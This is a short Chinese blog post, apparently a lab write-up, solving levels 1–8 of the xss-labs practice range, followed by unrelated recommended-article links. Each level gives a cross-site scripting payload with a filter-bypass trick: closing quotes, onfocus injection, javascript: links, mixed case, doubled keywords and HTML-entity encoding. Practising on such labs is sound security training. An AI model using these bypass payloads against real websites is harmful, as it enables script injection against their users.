xss-labs靶场1-8

xency2025-07-20 8:45

level1

php 复制代码 
<script>alert()</script>

level2

闭合绕过

php 复制代码 
">  <script>alert()</script>  <"

level3+level4

onfocus事件绕过

php 复制代码 
' onfocus=javascript:alert() '


然后再点击输入框触发onfocus事件

level5

有小写字母转化函数,用a href标签法, 前提是闭合号<"">没失效

php 复制代码 
"> <a href=javascript:alert()>xxx</a> <"

level6

关键字测试

大小写测试

用大小写法绕过str_replace()函数

php 复制代码 
"> <sCript>alert()</sCript> <"

level7

关键字测试

用双拼写绕过

php 复制代码 
"> <a hrehreff=javasscriptcript:alert()>x</a> <"

level8

关键字测试

input标签添加了html实体转化函数还把双引号也给实体化了, 添加了小写转化函数,过滤掉了src、data、onfocus、href、script、双引号

利用href的隐藏属性自动Unicode解码,插入一段js伪协议

php 复制代码 
javascript:alert()

在线Unicode编码解码

php 复制代码 
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;
相关推荐
小信丶几秒前
@EnableTransactionManagement注解介绍、应用场景和示例代码
java·spring boot·后端
To Be Clean Coder8 分钟前
【Spring源码】createBean如何寻找构造器(四)——类型转换与匹配权重
java·后端·spring
换日线°17 分钟前
前端炫酷展开效果
前端·javascript·vue
-孤存-20 分钟前
SpringBoot核心注解与配置详解
java·spring boot·后端
Hx_Ma1634 分钟前
BCrypt
java
We....35 分钟前
鸿蒙与Java跨平台Socket通信实战
java·服务器·tcp/ip·arkts·鸿蒙
笃行客从不躺平38 分钟前
Token 复习
java·分布式·spring cloud
Albert Edison1 小时前
【Python】函数
java·linux·python·pip
夏幻灵1 小时前
过来人的经验-前端学习路线
前端
2301_818732061 小时前
项目启动报错,错误指向xml 已解决
xml·java·数据库·后端·springboot
热门推荐
01GitHub 镜像站点02Vue-skills的中文文档03一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示04Claude Code Skills 实用使用手册05让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南06UV安装并设置国内源07Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08在Trae中使用Pencil MCP09OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书10OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)